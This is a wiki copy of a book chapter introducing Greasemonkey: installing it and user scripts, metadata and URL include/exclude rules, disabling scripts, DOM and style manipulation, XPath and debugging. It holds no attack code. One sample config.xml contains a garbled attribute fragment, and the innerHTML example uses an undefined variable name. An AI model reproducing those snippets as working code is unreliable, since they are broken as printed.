Greasemonkey Hacks/Getting Started
From WikiContent
Hacks 1–12: Introduction
The first thing you need to do to get started with Greasemonkey is install it. Open Firefox and go to http://greasemonkey.mozdev.org. Click the Install Greasemonkey link. Firefox will warn you that it prevented this site from installing software, as shown in Figure 1-1.
Click the Edit Options button to bring up the Allowed Sites dialog, as shown in Figure 1-2.
Click the Allow button to add the Greasemonkey site to your list of allowed sites; then click OK to dismiss the dialog. Now, click the Install Greasemonkey link again, and Firefox will pop up the Software Installation dialog, as shown in Figure 1-3.
Click Install Now to begin the installation process. After it downloads, quit Firefox and relaunch it to finish installing Greasemonkey.
Now that that's out of the way, let's get right to it.
Install a User Script
Greasemonkey won't do anything until you start installing user scripts to customize specific web pages.
A Greasemonkey user script is a single file, written in JavaScript, that customizes one or more web pages. So, before Greasemonkey can start working for you, you need to install a user script.
Tip
Many user scripts are available at the Greasemonkey script repository: http://userscripts.org.
This hack shows three ways to install user scripts. The first user script I ever wrote was called Butler. It adds functionality to Google search results.
Installing from the Context Menu
Here's how to install Butler from the context menu:
- Visit the Butler home page (http://diveintomark.org/projects/butler/) to see a brief description of the functionality that Butler offers.
- Right-click (Control-click on a Mac) the link titled "Download version…" (at the time of this writing, Version 0.3 is the latest release).
- From the context menu, select Install User Script….
- A dialog titled Install User Script will pop up, displaying the name of the script you are about to install (Butler, in this case), a brief description of what the script does, and a list of included and excluded pages. All of this information is taken from the script itself [Hack #2].
- Click OK to install the user script.
If all went well, Greasemonkey will display the following alert: "Success! Refresh page to see changes."
Now, search for something in Google. In the search results page, there is a line at the top of the results that says "Try your search on: Yahoo, Ask Jeeves, AlltheWeb…" as shown in Figure 1-4. There is also a banner along the top that says "Enhanced by Butler." All of these options were added by the Butler user script.
Installing from the Tools Menu
My Butler user script has a home page, but not all scripts do. Sometimes the author posts only the script itself. You can still install such scripts, even if there are no links to right-click.
Visit http://diveintomark.org/projects/butler/butler.user.js. You will see the Butler source code displayed in your browser. From the Tools menu, select Install User Script…. Greasemonkey will pop up the Install User Script dialog, and the rest of the installation is the same as described in the previous section.
Editing Greasemonkey's Configuration Files
Like most Firefox browser extensions, Greasemonkey stores its configuration files in your Firefox profile directory. You can install a user script manually by placing it in the right directory and editing the Greasemonkey configuration file with a text editor.
First you'll need to find your Firefox profile directory, which is harder than it sounds. The following list, from Nigel MacFarlane's excellent Firefox Hacks (O'Reilly), shows where to find this directory on your particular system:
- Single-user Windows 95/98/ME
- C:\Windows\Application Data\Mozilla\Firefox
- Multiuser Windows 95/98/ME
- C:\Windows\Profiles\%USERNAME%\Application Data\Mozilla\Firefox
- Windows NT 4.x
- C:\Winnt\Profiles\%USERNAME%\Application Data\Mozilla\Firefox
- Windows 2000 and XP
- C:\Documents and Settings\%USERNAME%\Application Data\Mozilla\Firefox
- Unix and Linux
- ~/.mozilla/firefox
- Mac OS X
- ~/Library/Application Support/Firefox
Within your Firefox directory is your Profiles directory, and within that is a randomly named directory (for security reasons). Within that is a series of subdirectories: extensions/{e4a8a97b-f2ed-450b-b12d-ee082ba24781}/chrome/greasemonkey/content/scripts/. This final scripts directory contains all your installed user scripts, as well as a configuration file named config.xml. Here's a sample config.xml file:
<UserScriptConfig> <Script filename="bloglinesautoloader.user.js" name="Bloglines Autoloader" namespace="http://diveintomark.org/projects/greasemonkey/" description="Auto-display all new items in Bloglines (the equivalent of clicking the root level of your subscriptions)" enabled="true"> <Include>http://bloglines.com/myblogs*</Include> <Include>http://www.bloglines.com/myblogs*</Include> </Script> <Script filename extensionsfilename="googlesearchkeys.user.js".user.js filename extension name="Google Searchkeys" namespace="http://www.imperialviolet.org" description="Adds one-press access keys to Google search results" enabled="true"> <Include>http://www.google.*/search*</Include> </Script> <Script filename="mailtocomposeingmail.user.js" name="Mailto Compose In GMail" namespace="http://blog.monstuff.com/archives/000238.html" description="Rewrites "mailto:" links to GMail compose links" enabled="true"> <Include>*</Include> <Exclude>http://gmail.google.com</Exclude> </Script> </UserScriptConfig>
To install a new script, simply copy it to this scripts directory and add a <Script> entry like the other ones in config.xml. The <Script> element has five attributes: filename, name, namespace, description, and enabled. Within the <Script> element you can have multiple <Include> and <Exclude> elements, as defined in "Provide a Default Configuration" [Hack #2].
For example, to manually install the Butler user script, copy the butler.user.js file into your scripts directory, and then add this XML snippet to config.xml, just before </UserScriptConfig>:
<Script filename="butler.user.js" name="Butler" namespace="http://diveintomark.org/projects/butler/" description="Link to competitors in Google search results" enabled="true"> <Include>*</Include> <Exclude>http://*.google.*/*</Exclude> </Script>
Tip
A user script's filename must end in .user.js. If you've gotten the file extension wrong, you won't be able to right-click the script's link and select Install User Script…from the context menu. You won't even be able to visit the script itself and select Install User Script…from the Tools menu.
Provide a Default Configuration
User scripts can be self-describing; they can contain information about what they do and where they should run by default.
Every user script has a section of metadata, which tells Greasemonkey about the script itself, where it came from, and when to run it. You can use this to provide users with information about your script, such as its name and a brief description of what the script does. You can also provide a default configuration for where the script should run: one page, one site, or a selection of multiple sites.
The Code
Save the following user script as helloworld.user.js:
Example: Hello World // ==UserScript== // @name Hello World // @namespace http://www.oreilly.com/catalog/greasemonkeyhacks/ // @description example script to alert "Hello world!" on every page // @include * // @exclude http://oreilly.com/* // @exclude http://www.oreilly.com/* // ==/UserScript== alert('Hello world!');
There are five separate pieces of metadata here, wrapped in a set of Greasemonkey-specific comments.
Wrapper
Let's take them in order, starting with the wrapper:
// ==UserScript== // // ==/UserScript==
These comments are significant and must match this pattern exactly. Greasemonkey uses them to signal the start and end of a user script's metadata section. This section can be defined anywhere in your script, but it's usually near the top.
Name
Within the metadata section, the first item is the name:
// @name Hello World
This is the name of your user script. It is displayed in the install dialog when you first install the script and later in the Manage User Scripts dialog. It should be short and to the point.
@name is optional. If present, it can appear only once. If not present, it defaults to the filename of the user script, minus the .user.js extension.
Namespace
Next comes the namespace:
// @namespace http://www.oreilly.com/catalog/greasemonkeyhacks/
This is a URL, which Greasemonkey uses to distinguish user scripts that have the same name but are written by different authors. If you have a domain name, you can use it (or a subdirectory) as your namespace. Otherwise, you can use a tag: URI.
Tip
Learn more about tag: URIs at http://www.taguri.org.
@namespace is optional. If present, it can appear only once. If not present, it defaults to the domain from which the user downloaded the user script.
Tip
You can specify the items of your user script metadata in any order. I like @name, @namespace, @description, @include, and finally @exclude, but there is nothing special about this order.
Description
Next comes the description:
// @description example script to alert "Hello world!" on every page
This is a human-readable description of what the user script does. It is displayed in the install dialog when you first install the script and later in the Manage User Scripts dialog. It should be no longer than two sentences.
@description is optional. If present, it can appear only once. If not present, it defaults to an empty string.
Tip
Though @description is not mandatory, don't forget to include it. Even if you are writing user scripts only for yourself, you will eventually end up with dozens of them, and administering them all in the Manage User Scripts dialog will be much more difficult if you don't include a description.
URL Directives
The next three lines are the most important items (from Greasemonkey's perspective). The @include and @exclude directives give a series of URLs and wildcards that tell Greasemonkey where to run this user script:
// @include * // @exclude http://oreilly.com/* // @exclude http://www.oreilly.com/*
The @include and @exclude directives share the same syntax. They can be a URL, a URL with the * character as a simple wildcard for part of the domain name or path, or simply the * wildcard character by itself. In this case, we are telling Greasemonkey to execute the Hello World script on all sites except http://oreilly.com and http://www.oreilly.com. Excludes take precedence over includes, so if you went to http://www.oreilly.com/catalog/, the user script would not run. The URL http://oreilly.com/catalog/ matches the @include * (all sites), but it would be excluded because it also matches @exclude http://oreilly.com/*.
@include and @exclude are optional. You can specify as many included and excluded URLs as you like, but you must specify each on its own line. If neither is specified, Greasemonkey will execute your user script on all sites (as if you had specified @include *).
Master the @include and @exclude Directives
Describing exactly where you want your user script to execute can be tricky.
As described in "Provide a Default Configuration" [Hack #2], Greasemonkey executes a user script based on @include and @exclude parameters: URLs with * wildcards that match any number of characters. This might seem like a simple syntax, but combining wildcards to match exactly the set of pages you want is trickier than you think.
Matching with or Without the www. Prefix
Here's a common scenario: a site is available at http://example.com and http://www.example.com. The site is the same in both cases, but neither URL redirects to the other. If you type example.com in the location bar, you get the site at http://example.com. If you visit www.example.com, you get exactly the same site, but the location bar reads http://www.example.com.
Let's say you want to write a user script that runs in both cases. Greasemonkey makes no assumptions about URLs that an end user might consider equivalent. If a site responds on both http://example.com and http://www.example.com, you need to declare both variations, as shown in this example:
@include http://example.com/* @include http://www.example.com/*
Matching All Subdomains of a Site
Here's a slightly more complicated scenario. Slashdot is a popular technical news and discussion site. It has a home page, which is available at both http://slashdot.org and http://www.slashdot.org. But it also has specialized subdomains, such as http://apache.slashdot.org/, http://apple.slashdot.org/, and so forth.
Say you want to write a user script that runs on all these sites. You can use a wildcard within the URL itself to match all the subdomains, like this:
@include http://slashdot.org/* @include http://*.slashdot.org/*
The first line matches when you visit http://slashdot.org. The second line matches when you visit http://www.slashdot.org (the * wildcard matches www). The second line also matches when you visit http://apache.slashdot.org/ or http://apple.slashdot.org/; the * wildcard matches apache and apple, respectively.
Matching Different Top-Level Domains of a Site
Now things get really tricky. Amazon is available in the United States at http://www.amazon.com. (Because http://amazon.com visibly redirects you to http://www.amazon.com, we won't need to worry about matching both.) But Amazon also has country-specific sites, such as http://www.amazon.co.uk/ in England, http://www.amazon.co.jp/ in Japan, and so forth.
If you want to write a user script that runs on all of Amazon's country-specific sites, there is a special type of wildcard, .tld, that matches all the top-level domains, as shown in the following example:
@include http://www.amazon.tld/*
This special syntax matches any top-level domain: .com, .org, .net, or a country-specific domain, such as .co.uk or .co.jp. Greasemonkey keeps a list of all the registered top-level domains in the world and expands the .tld wildcard to include each of them.
Tip
You can find out more about the available top-level domains at http://www.icann.org/tlds/.
Deciding Between * and http://*
One final note, before we put the @include and @exclude issue to bed. If you're writing a user script that applies to all pages, there are two subtly different ways to do that. Here's the first way:
@include *
This means that the user script should execute absolutely everywhere. If you visit a web site, the script will execute. If you visit a secure site (one with an https:// address), the script will execute. If you open an HTML file from your local hard drive, the script will execute. If you open a blank new window, the script will execute (since technically the "location" of a blank window is about:blank).
This might not be what you want. If you want the script to execute only on actual remote web pages "out there" on the Internet, you should specify the @include line differently, like this:
@include http://*
This means that the user script will execute only on remote web sites, whose address starts with http://. This will not include secure web sites, such as your bank's online bill payment site, because that address starts with https://. If you want the script to run on both secure and standard web sites, you'll need to explicitly specify both, like so:
@include http://* @include https://*
Prevent a User Script from Executing
You can disable a user script temporarily, disable all user scripts, or uninstall a user script permanently.
Once you have a few user scripts running, you might want to temporarily disable some or all of them. There are several different ways to prevent a user script from running.
Disabling a User Script Without Uninstalling It
The easiest way to disable a user script is in the Manage User Scripts dialog. Assuming you installed the Butler user script [Hack #1], you can disable it with just a few clicks:
- From the menu bar, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog.
- In the left pane of the dialog is a list of all the user scripts you have installed. (If you've been following along from the beginning of the book, this will include just one script: Butler.)
- Select Butler in the list if it is not already selected, and deselect the Enabled checkbox. The color of Butler in the left pane should change subtly from black to gray. (This is difficult to see while it is still selected, but it's more useful once you have dozens of scripts installed.)
- Click OK to exit the Manage User Scripts dialog.
Now, Butler is installed, but inactive. You can verify this by searching for something on Google. It should no longer say "Enhanced by Butler" along the top. You can reenable the Butler user script by repeating the procedure and reselecting the Enabled checkbox in the Manage User Scripts dialog.
Tip
Once disabled, a user script will remain disabled until you manually reenable it, even if you quit and relaunch Firefox.
Disabling All User Scripts
While Greasemonkey is installed, it displays a little smiling monkey icon in the status bar, as shown in Figure 1-5.
Clicking the Greasemonkey icon in the status bar disables Greasemonkey entirely; any user scripts you have installed will no longer execute. The Greasemonkey icon will frown and turn gray to indicate that Greasemonkey is currently disabled, as shown in Figure 1-6.
Clicking the icon again reenables Greasemonkey and any enabled user scripts.
Disabling a User Script by Removing All Included Pages
As shown in "Master the @include and @exclude Directives" [Hack #3], user scripts contain two sections: a list of pages to run the script and a list of pages not to run the script. Another way to prevent a user script from executing is to remove all the pages on which it runs:
- From the menu bar, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog.
- In the left pane of the dialog is a list of all the user scripts you have installed.
- Select Butler in the list if it is not already selected, and then select http://*.google.com/* in the list of Included Pages. Click the Remove button to remove this URL from the list.
- Click OK to exit the Manage User Scripts dialog.
Disabling a User Script by Excluding All Pages
Yet another way to disable a user script is to add a wildcard to exclude it from all pages:
- From the menu, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog.
- In the left pane of the dialog is a list of all the user scripts you have installed.
- Select Butler in the list if it is not already selected.
- Under the Excluded Pages list, click the Add button. Greasemonkey will pop up an Add Page dialog box. Type * and click OK.
- Click OK to exit the Manage User Scripts dialog.
Now, Butler is still installed and technically still active. But because excluded pages take precedence over included pages, Butler will never actually be executed, because you have told Greasemonkey to exclude it from all pages.
Disabling a User Script by Editing config.xml
As shown in "Install a User Script" [Hack #1], Greasemonkey stores the list of installed scripts in a configuration file, config.xml, deep within your Firefox profile directory:
<UserScriptConfig> <Script filename="butler.user.js" name="Butler" namespace="http://diveintomark.org/projects/butler/" description="Link to competitors from Google search results" enabled="true"> <Include>http://*.google.com/*</Include> </Script> </UserScriptConfig>
You can manually edit this file to disable a user script. To disable Butler, find its <Script> element in config.xml, and then set the enabled attribute to false.
Uninstalling a User Script
Finally, you can remove a user script entirely by uninstalling it:
- From the menu bar, select Tools → Manage User Scripts…. Greasemonkey will pop up a Manage User Scripts dialog.
- In the left pane, select Butler.
- Click Uninstall.
- Click OK to exit the Manage User Scripts dialog.
Butler is now uninstalled completely.
Configure a User Script
There's more than one way to configure Greasemonkey user scripts: before, during, and after installation.
One of the most important pieces of information about a user script is where it should run. One page? Every page on one site? Multiple sites? All sites? This hack explains several different ways to configure where a user script executes.
Inline
As described in "Provide a Default Configuration" [Hack #2], user scripts contain a section that describes what the script is and where it should run. Editing the @include and @exclude lines in this section is the first and easiest way to configure a user script, because the configuration travels with the script code. If you copy the file to someone else's computer or publish it online, other people will pick up the default configuration.
During Installation
Another good time to alter a script's metadata is during installation. Remember in "Install a User Script" [Hack #1] when you first installed the Butler user script? Immediately after you select the Install User Script…menu item, Greasemonkey displays a dialog box titled Install User Script, which contains lists of the included and excluded pages, as shown in Figure 1-7.
The two lists are populated with the defaults that are defined in the script's metadata section (specifically, the @include and @exclude lines), but you can change them to anything you like before you install the script. Let's say, for example, that you like Butler, but you have no use for it on Froogle, Google's cleverly named product comparison site. Before you install the script, you can modify the configuration to exclude that site but still let the script work on other Google sites.
To ensure that Butler doesn't alter Froogle, click the Add…button under "Excluded pages" and type the wildcard URL for Froogle, as shown in Figure 1-8.
After Installation
You can also reconfigure a script's included and excluded pages after the script is installed. Assuming you previously excluded Froogle from Butler's configuration (as described in the previous section), let's now change the configuration to include Froogle again:
- From the Firefox menu, select Tools/Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog.
- In the pane on the left, select Butler. In the pane on the right, Greasemonkey should show you two lists: one of included pages (http://*.google.*/*) and one of excluded pages (http://froogle.google.com/*).
- In the "Excluded pages" list, select http://froogle.google.com/* and click the Remove button.
- Click OK to exit the Manage User Scripts dialog.
Now, search for a product on Froogle to verify that Butler is once again being executed.
Editing Configuration Files
The last way to reconfigure a user script is to manually edit the config.xml file, which is located within your Firefox profile directory. (See "Install a User Script" [Hack #1] for the location.) The graphical dialogs Greasemonkey provides are just friendly ways of editing config.xml without knowing it.
Each installed user script is represented by a <Script> element, as shown in the following example:
<Script filename="helloworld.user.js" name="Hello World" namespace="http://www.oreilly.com/catalog/greasemonkeyhcks/" description="example script to alert "Hello world!" on every page" enabled="true"> <Include>*</Include> <Exclude>http://oreilly.com/*</Exclude> <Exclude>http://www.oreilly.com/*</Exclude> </Script>
You can make any changes you like to the config.xml file. You can add, remove, or edit the <Include> and <Exclude> elements to change where the script runs. You can change the enabled attribute to false to disable the script. You can even uninstall the script by deleting the entire <Script> element.
Tip
Starting in Version 0.5, Greasemonkey no longer caches the config.xml file in memory. If you manually change the config.xml file while Firefox is running, you will see the changes immediately when you navigate to a new page or open the Manage User Scripts dialog.
Add or Remove Content on a Page
Use DOM methods to manipulate the content of a web page.
Since most user scripts center around adding or removing content from a web page, let's quickly review the standard DOM methods for manipulating content.
Adding an Element
The following code adds a new element to the end of the page. The element will appear at the bottom of the page, unless you style it with CSS to position it somewhere else [Hack #7]:
var elmNewContent = document.createElement('div'); document.body.appendChild(elmNewContent)
Removing an Element
You can also remove elements from a page. Removed elements disappear from the page (obviously), and any content after them collapses to fill the space the elements occupied. The following code finds the element with id="ads" and removes it:
var elmDeleted = document.getElementById("ads"); elmDeleted.parentNode.removeChild(elmDeleted);
Tip
If all you want to do is remove ads, it's probably easier to install the AdBlock extension than to write your own user script. You can download AdBlock at http://adblock.mozdev.org.
Inserting an Element
Many user scripts insert content into a page, rather than appending it to the end of the page. The following code creates a link to http://www.example.com and inserts it immediately before the element with id="foo":
var elmNewContent = document.createElement('a'); elmNewContent.href = 'http://www.example.com/'; elmNewContent.appendChild(document.createTextNode('click here')); var elmFoo = document.getElementById('foo'); elmFoo.parentNode.insertBefore(elmNewContent, elmFoo);
You can also insert content after an existing element, by using the nextSibling property:
elmFoo.parentNode.insertBefore(elmNewContent, elmFoo.nextSibling);
Tip
Inserting new content before elmFoo.nextSibling will work even if elmFoo is the last child of its parent (i.e., it has no next sibling). In this case, elmFoo.nextSibling will return null, and the insertBefore function will simply append the new content after all other siblings. In other words, this example code will always work, even when it seems like it shouldn't.
Replacing an Element
You can replace entire chunks of a page in one shot by using the replaceChild method. The following code replaces the element with id="extra" with content that we create on the fly:
var elmNewContent = document.createElement('p'); elmNewContent.appendChild(document.createTextNode('Replaced!')); var elmExtra = document.getElementById('extra'); elmExtra.parentNode.replaceChild(elmNewContent, elmExtra);
As you can see from the previous few examples, the process of creating new content can be arduous. Create an element, append some text, set individual attributes…bah. There is an easier way. It's not a W3C-approved DOM property, but all major browsers support the innerHTML property for getting or setting HTML content as a string. The following code accomplishes the same thing as the previous example:
var elmExtra = document.getElementById('extra'); elmReplaced.innerHTML = '<p>Replaced!</p>';
The HTML you set with the innerHTML property can be as complex as you like. Firefox will parse it and insert it into the DOM tree, just as if you had created each element and inserted it with standard DOM methods.
Modifying an Element's Attributes
Modifying a single attribute is simple. Each element is an object in JavaScript, and each attribute is reflected by a corresponding property. The following code finds the link with id="somelink" and changes its href property to link to a different URL:
var elmLink = document.getElementById('somelink'); elmLink.href = 'http://www.oreilly.com/';
You can accomplish the same thing with the setAttribute method:
elmLink.setAttribute('href', 'http://www.oreilly.com/')
This is occasionally useful, if you are setting an attribute whose name you don't know in advance.
You can also remove an attribute entirely with the removeAttribute method:
elmLink.removeAttribute('href');
Tip
See "Make Pop-up Titles Prettier" [Hack #28] for an example of why this might be useful.
If you remove the href attribute from a link, it will still be an <a> element, but it will cease to be a link. If the link has an id or name attribute, it will still be a page anchor, but you will no longer be able to click it to follow the link.
Tip
http://www.quirksmode.org is a great reference for browser DOM support.
Alter a Page's Style
There are four basic ways to add or modify a page's CSS rules.
In many of the user scripts I've written, I want to make things look a certain way. Either I'm modifying the page's original style in some way, or I'm adding content to the page and I want to make it look different from the rest of the page. There are several ways to accomplish this.
Adding a Global Style
Here is a simple function that I reuse in most cases in which I need to add arbitrary styles to a page. It takes a single parameter, a string containing any number of CSS rules:
function addGlobalStyle(css) { try { var elmHead, elmStyle; elmHead = document.getElementsByTagName('head')[0]; elmStyle = document.createElement('style'); elmStyle.type = 'text/css'; elmHead.appendChild(elmStyle); elmStyle.innerHTML = css; } catch (e) { if (!document.styleSheets.length) { document.createStyleSheet(); } document.styleSheets[0].cssText += css; } }
Inserting or Removing a Single Style
As you see in the previous example, Firefox maintains a list of the stylesheets in use on the page, in document.styleSheets (note the capitalization!). Each item in this collection is an object, representing a single stylesheet. Each stylesheet object has a collection of rules, and methods to add new rules or remove existing rules.
The insertRule method takes two parameters. The first is the CSS rule to insert, and the second is the positional index of the rule before which to insert the new rule:
document.styleSheets[0].insertRule('html, body { font-size: large }', 0);
Tip
In CSS, order matters; if there are two rules for the same CSS selector, the later rule takes precedence. The previous line will insert a rule before all other rules, in the page's first stylesheet.
You can also delete individual rules by using the deleteRule method. It takes a single parameter, the positional index of the rule to remove. The following code will remove the first rule, which we just inserted with insertRule:
document.styleSheets[0].deleteRule(0);
Modifying an Element's Style
You can also modify the style of a single element by setting properties on the element's style attribute. The following code finds the element with id="foo" and sets its background color to red:
var elmModify = document.getElementById("foo"); elmModify.style.backgroundColor = 'red';
Tip
The property names of individual styles are not always obvious. Generally they follow a pattern, where the CSS rule margin-top becomes the JavaScript expression someElement.style.marginTop. But there are exceptions. The float property is set with elmModify.style.cssFloat, since float is a reserved word in JavaScript.
There is no easy way to set multiple properties at once. In regular JavaScript, you can set multiple styles by calling the setAttribute method to the style attribute to a string:
elmModify.setAttribute("style", "background-color: red; color: white; " + "font: small serif");
However, as explained in "Avoid Common Pitfalls" [Hack #12], this does not work within Greasemonkey scripts.
Master XPath Expressions
Tap into a powerful new way to find exactly what you're looking for on a page.
Firefox contains a little-known but powerful feature called XPath. XPath is a query language for searching the Document Object Model (DOM) that Firefox constructs from the source of a web page.
As mentioned in "Add or Remove Content on a Page" [Hack #6], virtually every hack in this book revolves around the DOM. Many hacks work on a collection of elements. Without XPath, you would need to get a list of elements (for example, with document.getElementsByTagName) and then test each one to see if it's something of interest. With XPath expressions, you can find exactly the elements you want, all in one shot, and then immediately start working with them.
Tip
A good beginners' tutorial on XPath is available at http://www.zvon.org/xxl/XPathTutorial/General/examples.html.
Basic Syntax
To execute an XPath query, use the document.evaluate function. Here's the basic syntax:
var snapshotResults = document.evaluate('XPath expression', document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
The function takes five parameters:
- The XPath expression itself
- More on this in a minute.
- The root node on which to evaluate the expression
- If you want to search the entire web page, pass in document. But you can also search just a part of the page. For example, to search within a <div id="foo">, pass document.getElementById("foo") as the second parameter.
- A namespace resolver function
- You can use this to create XPath queries that work on XHTML pages. See "Select Multiple Checkboxes" [Hack #36] for an example.
- The type of result to return
- If you want a collection of elements, use XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE. If you want to find a single element, use XPathResult.FIRST_ORDERED_NODE_TYPE. More on this in a minute, too.
- A previous XPath result to append to this result
- I rarely use this, but it can be useful if you want to conditionally concatenate the results of multiple XPath queries.
The document.evaluate function returns a snapshot, which is a static array of DOM nodes. You can iterate through the snapshot or access its items in any order. The snapshot is static, which means it will never change, no matter what you do to the page. You can even delete DOM nodes as you move through the snapshot.
A snapshot is not an array, and it doesn't support the standard array properties or accessors. To get the number of items in the snapshot, use snapResults.snapshotLength. To access a particular item, you need to call snapshotResults.snapshotItem(index). Here is the skeleton of a script that executes an XPath query and loops through the results:
var snapResults = document.evaluate("XPath expression", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); for (var i = snapResults.snapshotLength - 1; i >= 0; i--) { var elm = snapResults.snapshotItem(i); // do stuff with elm }
Examples
The following XPath query finds all the elements on a page with class="foo":
var snapFoo = document.evaluate("//*[@class='foo']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
The // means "search for things anywhere below the root node, including nested elements." The * matches any element, and [@class='foo'] restricts the search to elements with a class of foo.
You can use XPath to search for specific elements. The following query finds all <input type="hidden"> elements. (This example is taken from "Show Hidden Form Fields" [Hack #30].)
var snapHiddenFields = document.evaluate("//input[@type='hidden']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
You can also test for the presence of an attribute, regardless of its value. The following query finds all elements with an accesskey attribute. (This example is taken from "Add an Access Bar with Keyboard Shortcuts" [Hack #68].)
var snapAccesskeys = document.evaluate("//*[@accesskey]", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
Not impressed yet? Here's a query that finds images whose URL contains the string "MZZZZZZZ". (This example is taken from "Make Amazon Product Images Larger" [Hack #25].)
var snapProductImages = document.evaluate("//img[contains(@src, 'MZZZZZZZ')]", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
You can also do combinations of attributes. This query finds all images with a width of 36 and a height of 14. (This query is taken from "Zap Ugly XML Buttons" [Hack #86].)
var snapXMLImages = document.evaluate("//img[@width='36'][@height='14']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
But wait, there's more! By using more advanced XPath syntax, you can actually find elements that are contained within other elements. This code finds all the links that are contained in a paragraph whose class is g. (This example is taken from "Refine Your Google Search" [Hack #96].)
var snapResults = document.evaluate("//p[@class='g']//a", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
Finally, you can find a specific element by passing XPathResult.FIRST_ORDERED_NODE_TYPE in the third parameter. This line of code finds the first link whose class is "yschttl". (This example is taken from "Prefetch Yahoo! Search Results" [Hack #52].)
var elmFirstResult = document.evaluate("//a[@class='yschttl']", document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue;
If you weren't brain-fried by now, I'd be very surprised. XPath is, quite literally, a language all its own. Like regular expressions, XPath can make your life easier, or it can make your life a living hell. Remember, you can always get what you need (eventually) with standard DOM functions such as document.getElementById or document.getElementsByTagName. XPath's a good tool to have in your tool chest, but it's not always the right tool for the job.
Develop a User Script "Live"
Edit a user script and see your changes immediately.
While you're writing a user script, you will undoubtedly need to make changes incrementally and test the results. As shown in "Install a User Script" [Hack #1], Greasemonkey stores your installed user scripts deep within your Firefox profile directory. Changes to these installed files take effect immediately, as soon as you refresh the page. This makes the testing cycle quick, because you can edit your partially written script, save changes, and refresh your test page to see the changes immediately.
Setting Up File Associations
Before you can take advantage of live editing, you need to set up file associations on your system, so that double-clicking a .user.js script opens the file in your text editor instead of trying to execute it or viewing it in a web browser.
On Mac OS X.
Control-click a .user.js file in Finder, and then select Get Info. In the Open With section, select your text editor from the drop-down menu, or select Other…to find the editor program manually. Click Change All to permanently associate your editor with .js files.
On Windows.
Right-click a .user.js file in Explorer, and then select Open With → Choose Program. Select your favorite text editor from the list, or click Browse to find the editor application manually. Check the box titled "Always use the selected program to open this kind of file" and click OK.
The "Live Editing" Development Cycle
Switch back to Firefox and select Tools → Manage User Scripts. Select a script from the pane on the left and click Edit. If your file associations are set up correctly, this should open the user script in your text editor.
The first time you do this on Windows, you will get a warning message, explaining that you need to set up your file associations, as shown in Figure 1-9. You're one step ahead of the game, since you've already done this.
Tip
The reason for the warning is that, by default, Windows is configured to execute .js files in the built-in Windows Scripting Host environment. This is generally useless, and certainly confusing if you don't know what's going on.
Once the user script opens in your text editor, you can make any changes you like to the code. You're editing the copy of the user script within your Firefox profile directory—the copy that Greasemonkey uses. As soon as you make a change and save it, you can switch back to Firefox and refresh your test page to see the effect of your change. Switch to your editor, make another change, switch back to Firefox, and refresh. It's that simple.
Tip
During live editing, you can change only the code of a user script, not the configuration parameters in the metadata section. If you want to change where the script runs, use the Manage User Scripts dialog.
When you're satisfied with your user script, switch back to your editor one last time and save a copy to another directory.
Warning
Remember, you've been editing the copy deep within your Firefox profile directory. I've lost significant chunks of code after live-editing a user script and then uninstalling it without saving a copy first. Don't make this mistake! Save a backup somewhere else for safekeeping.
Debug a User Script
Learn the subtle art of Greasemonkey debugging.
The actual process of writing user scripts can be frustrating if you don't know how to debug them properly. Since JavaScript is an interpreted language, errors that would otherwise cause a compilation error (such as misspelled variables or function names) can only be caught when they occur at runtime. Furthermore, if something goes wrong, it's not immediately obvious how to figure out what happened, much less how to fix it.
Check Error Messages
If your user script doesn't appear to be running properly, the first place to check is JavaScript Console, which lists all script-related errors, including those specific to user scripts. Select Tools → JavaScript Console to open the JavaScript Console window. You will probably see a long list of all the script errors on all the pages you've visited since you opened Firefox. (You'd be surprised how many high-profile sites have scripts that crash regularly.)
In the JavaScript Console window, click Clear to remove the old errors from the list. Now, refresh the page you're using to test your user script. If your user script is crashing or otherwise misbehaving, you will see the exception displayed in JavaScript Console.
Tip
If your user script is crashing, JavaScript Console will display an exception and a line number. Due to the way Greasemonkey injects user scripts into a page, this line number is not actually useful, and you should ignore it. It is not the line number within your user script where the exception occurred.
If you don't see any errors printed in JavaScript Console, you might have a configuration problem. Go to Tools → Manage User Scripts and double-check that your script is installed and enabled and that your current test page is listed in the Included Pages list.
Log Errors
OK, so your script is definitely running, but it isn't working properly. What next? You can litter your script with alert calls, but that's annoying. Instead, Greasemonkey provides a logging function, GM_log, that allows you to write messages to JavaScript Console. Such messages should be taken out before release, but they are enormously helpful in debugging. Plus, watching the console pile up with log messages is much more satisfying than clicking OK over and over to dismiss multiple alerts.
GM_log takes one argument, the string to be logged. After logging to JavaScript Console, the user script will continue executing normally.
Save the following user script as testlog.user.js:
// ==UserScript== // @name TestLog // @namespace http://example.com/ // ==/UserScript== if (/^http:\/\/www\.oreilly\.com\//.test(location.href)) { GM_log("running on O'Reilly site"); } else { GM_log('running elsewhere'); } GM_log('this line is always printed');
If you install this user script and visit http://www.oreilly.com, these two lines will appear in JavaScript Console:
Greasemonkey: http://example.com//TestLog: running on O'Reilly site Greasemonkey: http://example.com//TestLog: this line is always printed
Greasemonkey dumps the namespace and script name, taken from the user script's metadata section, then the message that was passed as an argument to GM_log.
If you visit somewhere other than http://www.oreilly.com, these two lines will appear in JavaScript Console:
Greasemonkey: http://example.com//TestLog: running elsewhere Greasemonkey: http://example.com//TestLog: this line is always printed
Messages logged in Javascript Console are not limited to 255 characters. Plus, lines in JavaScript Console wrap properly, so you can always scroll down to see the rest of your log message. Go nuts with logging!
Tip
In JavaScript Console, you can right-click (Mac users Control-click) on any line and select Copy to copy it to the clipboard.
Find Page Elements
DOM Inspector allows you to explore the parsed Document Object Model (DOM) of any page. You can get details on each HTML element, attribute, and text node. You can see all the CSS rules from each page's stylesheets. You can explore all the scriptable properties of an object. It's extremely powerful.
